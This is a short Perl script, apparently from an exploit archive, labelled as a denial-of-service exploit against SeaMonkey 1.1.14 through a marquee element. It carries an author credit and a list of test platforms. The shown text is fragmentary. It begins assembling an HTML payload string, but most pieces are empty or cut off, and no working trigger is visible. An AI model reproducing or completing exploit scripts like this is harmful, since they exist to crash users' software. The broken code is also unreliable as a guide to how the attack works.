#!/usr/bin/perl
# SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit
# by athos - staker[at]hotmail[dot]it
# tested on ubuntu 8.10 / slackware 12.2
# thanks to SirDark because he has tested on slackware
my $data = undef;
my $file = shift or &usage;
exploit();
sub exploit {
$data .= "
";
$data .= "SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit";
$data .= "";
$data .= "